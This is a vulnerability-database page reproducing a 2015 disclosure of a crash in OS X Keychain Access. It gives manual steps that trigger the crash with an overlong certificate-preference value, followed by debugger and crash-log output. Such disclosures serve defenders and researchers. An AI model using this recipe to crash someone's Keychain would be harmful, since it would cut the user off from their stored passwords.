Vulners
Lucene search
OS X Keychain EXC_BAD_ACCESS Denial Of Service
`# Exploit Title: OSX Keychain - EXC_BAD_ACCESS
# Date: 22/07/2015
# Exploit Author: Juan Sacco
# Vendor Homepage: https://www.apple.com
# Software Link: https://www.apple.com/en/downloads/
# Version: 9.0 (55161)
# Tested on: OSX Yosemite 10.10.4
# CVE : None
# History - Reported to [email protected] 20 Jul 2015
# Be careful: Crashing the Keychain will affect the user ability to use
Keychain stored passwords.
# How to reproduce it manually
1. Select a certificate, right click "New certificate preference.."
2. Under "Location or Email address:" add random values +9000
3. Click on Add to conduct the PoC manually
# Technically:
Performing @selector(addCertificatePreference:) from sender NSButton
0x608000148cf0
# Exception type
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_PROTECTION_FAILURE at 0x00007fff4d866828
External Modification Warnings:
VM Regions Near 0x7fff4d866828:
MALLOC_SMALL 00007f9e7d000000-00007f9e80000000 [ 48.0M]
rw-/rwx SM=PRV
--> STACK GUARD 00007fff4c7de000-00007fff4ffde000 [ 56.0M]
---/rwx SM=NUL stack guard for thread 0
Stack 00007fff4ffde000-00007fff507de000 [ 8192K]
rw-/rwx SM=COW thread 0
(lldb)
Process 490 resuming
Process 490 stopped
* thread #1: tid = 0x19b7, 0x00007fff92c663c3
Security`SecCertificateSetPreference + 325, queue =
'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=2,
address=0x7fff4d866828)
frame #0: 0x00007fff92c663c3 Security`SecCertificateSetPreference + 325
Security`SecCertificateSetPreference:
-> 0x7fff92c663c3 <+325>: callq 0x7fff92cf18b2 ; symbol stub
for: CFStringGetCString
0x7fff92c663c8 <+330>: movq %rbx, -0x670(%rbp)
0x7fff92c663cf <+337>: testb %al, %al
0x7fff92c663d1 <+339>: jne 0x7fff92c663d8 ; <+346>
Process: Keychain Access [598]
Path: /Applications/Utilities/Keychain
Access.app/Contents/MacOS/Keychain Access
Identifier: com.apple.keychainaccess
Version: 9.0 (55161)
Build Info: KeychainAccess-55161000000000000~620
Code Type: X86-64 (Native)
Parent Process: ??? [1]
Responsible: Keychain Access [598]
User ID: 501
Date/Time: 2015-07-28 13:32:05.183 +0200
OS Version: Mac OS X 10.10.4 (14E46)
Report Version: 11
Anonymous UUID: 08523B58-1EF8-DC4A-A7D7-CB31074E4395
Crashed Thread: 0 Dispatch queue: com.apple.main-thread
VM Regions Near 0x7fff507776c8:
MALLOC_SMALL 00007ff93c800000-00007ff93e000000 [ 24.0M]
rw-/rwx SM=PRV
--> STACK GUARD 00007fff4e5d7000-00007fff51dd7000 [ 56.0M]
---/rwx SM=NUL stack guard for thread 0
Stack 00007fff51dd7000-00007fff525d7000 [ 8192K]
rw-/rwx SM=COW thread 0
rax: 0x0000000001e5e1a0 rbx: 0x0000000000000006 rcx: 0x0000000008000100
rdx: 0x0000000001e5e1a0
rdi: 0x000060000045b6c0 rsi: 0x00007fff507776d0 rbp: 0x00007fff525d5f30
rsp: 0x00007fff507776d0
r8: 0x0000000000000000 r9: 0x00007fff79e6a300 r10: 0x00007ff93c019790
r11: 0x00007fff79147658
r12: 0x000000000000002d r13: 0x00007fff507776d0 r14: 0x00007fff525d5880
r15: 0x00007ff93ae41680
rip: 0x00007fff901083c3 rfl: 0x0000000000010202 cr2: 0x00007fff507776c8
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Aug 2015 00:00Current